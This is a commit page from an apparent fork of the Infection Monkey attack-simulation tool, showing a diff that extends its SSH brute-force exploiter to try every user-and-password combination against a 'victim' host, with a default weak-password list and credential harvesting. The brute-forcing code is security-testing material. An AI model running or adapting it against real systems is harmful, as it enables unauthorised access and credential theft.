p59342861
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Issue #18, added ability to attack multiple users in SSH brute force. 

Also fixed small bug in windows kill path parsing.
This commit is contained in:
acepace 2016-08-08 22:25:33 +03:00
parent 2ed7cc359e
commit d75ce529ab
3 changed files with 22 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
chaos_monkey/config.py
View File

@ -194,7 +194,7 @@ class Configuration(object):
psexec_passwords = ["Password1!", "1234", "password", "12345678"] psexec_passwords = ["Password1!", "1234", "password", "12345678"]
# ssh exploiter # ssh exploiter
ssh_user = "root" ssh_users = ["root"]
ssh_passwords = ["Password1!", "1234", "password", "12345678"] ssh_passwords = ["Password1!", "1234", "password", "12345678"]
# rdp exploiter # rdp exploiter

6
chaos_monkey/example.conf
View File

@ -39,7 +39,7 @@
"kill_file_path_linux": "/var/run/monkey.not", "kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\monkey.not", "kill_file_path_windows": "%windir%\\monkey.not",
"dropper_try_move_first": false, "dropper_try_move_first": false,
"exploiter_classes": [ "exploiter_classes": [
"SSHExploiter", "SSHExploiter",
@ -69,7 +69,9 @@
"serialize_config": false, "serialize_config": false,
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}", "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}",
"skip_exploit_if_file_exist": true, "skip_exploit_if_file_exist": true,
"ssh_user": "root", "ssh_user": [
"root"
],
"local_network_scan": true, "local_network_scan": true,
"tcp_scan_get_banner": true, "tcp_scan_get_banner": true,
"tcp_scan_interval": 200, "tcp_scan_interval": 200,

30
chaos_monkey/exploit/sshexec.py
View File

@ -1,12 +1,13 @@
import paramiko import paramiko
import monkeyfs
import logging import logging
import time
from itertools import product
import monkeyfs
from tools import build_monkey_commandline from tools import build_monkey_commandline
from exploit import HostExploiter from exploit import HostExploiter
from model import MONKEY_ARG from model import MONKEY_ARG
from exploit.tools import get_target_monkey from exploit.tools import get_target_monkey
from network.tools import check_port_tcp from network.tools import check_port_tcp
import time
__author__ = 'hoffer' __author__ = 'hoffer'
@ -43,31 +44,34 @@ class SSHExploiter(HostExploiter):
return False return False
passwords = list(self._config.ssh_passwords[:]) passwords = list(self._config.ssh_passwords[:])
known_password = host.get_credentials(self._config.ssh_user) users = list(self._config.ssh_users)
if known_password is not None: known_passwords = [host.get_credentials(x) for x in users]
if known_password in passwords: if len(known_passwords) > 0:
passwords.remove(known_password) for known_pass in known_passwords:
passwords.insert(0, known_password) if known_pass in passwords:
passwords.remove(known_pass)
passwords.insert(0, known_pass) #try first
user_pass = product(users,passwords)
exploited = False exploited = False
for password in passwords: for user, curpass in user_pass:
try: try:
ssh.connect(host.ip_addr, ssh.connect(host.ip_addr,
username=self._config.ssh_user, username=user,
password=password, password=curpass,
port=port, port=port,
timeout=None) timeout=None)
LOG.debug("Successfully logged in %r using SSH (%s : %s)", LOG.debug("Successfully logged in %r using SSH (%s : %s)",
host, self._config.ssh_user, password) host, user, curpass)
host.learn_credentials(self._config.ssh_user, password) host.learn_credentials(user, curpass)
exploited = True exploited = True
break break
except Exception, exc: except Exception, exc:
LOG.debug("Error logging into victim %r with user" LOG.debug("Error logging into victim %r with user"
" %s and password '%s': (%s)", host, " %s and password '%s': (%s)", host,
self._config.ssh_user, password, exc) user, curpass, exc)
continue continue
if not exploited: if not exploited: